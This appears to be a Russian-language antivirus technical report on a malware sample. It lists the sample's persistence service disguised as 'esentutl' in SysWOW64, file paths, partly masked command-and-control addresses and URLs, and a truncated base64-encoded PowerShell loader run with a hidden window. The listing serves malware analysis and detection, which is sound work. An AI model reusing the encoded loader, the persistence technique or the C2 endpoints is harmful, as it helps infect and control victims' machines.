Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\esentutl] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\esentutl] 'ImagePath' = '"%WINDIR%\SysWOW64\ndadmin\esentutl.exe"'
- 'esentutl' "%WINDIR%\SysWOW64\ndadmin\esentutl.exe"
- 'esentutl' %WINDIR%\SysWOW64\ndadmin\esentutl.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe
- %WINDIR%\syswow64\ndadmin\esentutl.exe
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe в %WINDIR%\syswow64\ndadmin\esentutl.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://ti###servis.com/cgi-bin/fqo/
- http://91.###.54.71:8080/V2KrgLE/kJXSA8/5dvnvk2OZu/zcn4bOaAlJ/iDmMXA2veM/5A0Riz4pmqTtus/ via 91.##1.54.71
- DNS ASK ti###servis.com
- '%HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe'
- '%WINDIR%\syswow64\ndadmin\esentutl.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...' (со скрытым окном)